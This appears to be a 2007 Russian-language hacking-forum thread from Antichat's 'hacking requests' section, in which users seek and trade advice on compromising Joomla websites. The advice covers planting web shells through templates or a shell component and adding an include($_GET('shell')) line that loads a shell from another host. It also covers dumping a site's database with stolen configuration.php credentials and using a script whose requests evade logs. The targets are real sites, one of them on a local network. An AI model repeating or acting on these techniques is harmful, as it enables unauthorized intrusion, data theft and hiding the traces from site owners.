ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > SЕО/Финансовые задачи/Социальные сети > Покупка, Продажа, Обмен > Просьбы о взломах
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Кто ломал Joomla
  #1  
Старый 23.01.2007, 05:23
Аватар для z37
z37
Banned
Регистрация: 03.12.2006
Сообщений: 1
Провел на форуме:
34548

Репутация: 7
Question Кто ломал Joomla

Как залить шелл в joomla!? Есть доступ в админ панель
 

  #2  
Старый 23.01.2007, 06:41
Аватар для hsi
hsi
Участник форума
Регистрация: 11.09.2006
Сообщений: 239
Провел на форуме:
626169

Репутация: 167
По умолчанию

Попробуй через шаблоны.
Тогда шелл будет лежать в директории site.com/templates.
 

xaxaxa
  #3  
Старый 24.01.2007, 04:59
Аватар для win32_reverse
win32_reverse
Новичок
Регистрация: 21.01.2007
Сообщений: 4
Провел на форуме:
13478

Репутация: 0
По умолчанию xaxaxa

Ребята, подскажите ещё варианты взлома этого двига. очень надо)) Может что-то через метасплоит выйдет? надеюсь на помощь
 

  #4  
Старый 24.01.2007, 05:19
Аватар для win32_reverse
win32_reverse
Новичок
Регистрация: 21.01.2007
Сообщений: 4
Провел на форуме:
13478

Репутация: 0
По умолчанию

блин, в локалке появился сайт на этом движке... слюньки текут... только ниразу с движком не работал. подскажите по существу что-то. плз. буду благодарен))
 

  #5  
Старый 24.01.2007, 06:53
Аватар для ice1k
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

Цитата:
Сообщение от win32_reverse  
блин, в локалке появился сайт на этом движке... слюньки текут... только ниразу с движком не работал. подскажите по существу что-то. плз. буду благодарен))
Если тебе нужно что-то, то смотри это "что-то" здесь:
http://www.securitylab.ru/search/index.php?q=Joomla&where=iblock_vulnerability
=\
 

  #6  
Старый 01.06.2007, 09:07
Аватар для lunt
lunt
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

есть копонент php shell для джомала где то 57 кб. в админке выбираешь установить компонент и указываешь на предварительно скачанный компонент php шел
я делал так, можно еще через компонент joomla explorer - открываешь любой php файл у которого стоят права на выполнение шела и добавляешь в конец иили в начало строку include($_GET('shell')); после пишешь полный путь к этой страничке м через cmd гет параметр подгружаешь шел с другого хоста, или можешь папку на чтение записиь нацйти и просто тудда шел загрузить, но жто опаснее - так как его можна найти очень легко
 

  #7  
Старый 27.07.2007, 10:36
Аватар для K0T
K0T
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

А есть дыры для Joomla! 1.0.12 Lavra Edition 2007? и есть Какие? пример желательно

Последний раз редактировалось K0T; 27.07.2007 в 10:41..
 

  #8  
Старый 30.08.2007, 14:00
Аватар для kuga
kuga
Новичок
Регистрация: 06.11.2006
Сообщений: 19
Провел на форуме:
242554

Репутация: 9
По умолчанию

Всем здоровья!
Подскажите, пожалуйста!

Сайт на Joomla!
В файле configuration.php есть строки:

$mosConfig_db = 'site';
$mosConfig_user = 'site';
$mosConfig_password = '4168227'; Изменен.

Это как я понял акк к БД. Вопрос - как её сдампить?

Пробывал через r57 - подключается к БД, но почему-то не дампит.
Спасибо.
 

  #9  
Старый 30.08.2007, 14:51
Аватар для IIAHbI4
IIAHbI4
Banned
Регистрация: 24.08.2006
Сообщений: 483
Провел на форуме:
3895065

Репутация: 1112
Отправить сообщение для IIAHbI4 с помощью ICQ
По умолчанию

мускульные ГУИ и вперёд. [Navicat MySQL в полне подойдёт]
 

  #10  
Старый 30.08.2007, 14:51
Аватар для TANZWUT
TANZWUT
Крёстный отец :)
Регистрация: 22.06.2005
Сообщений: 1,330
Провел на форуме:
5302668

Репутация: 2054


Отправить сообщение для TANZWUT с помощью ICQ
По умолчанию

http://shankar.name/sql.phps вот этим, пост запросы в логах не палятся
__________________
Лучший способ защиты - это нападение!!!
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
этот топик для тех кто ужэ ломал ломает или поможет взломать чаров в БК ФИГЕЮ Болталка 15 24.12.2008 21:07
Кто ломал онлайн игры! [ xXx ] Болталка 45 26.07.2007 23:15
Кто юзал Joomla? je0n Болталка 4 15.01.2007 18:08
Кто нибудь ломал чаты на Mpchat.ru vamik Чаты 7 13.08.2006 11:13



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ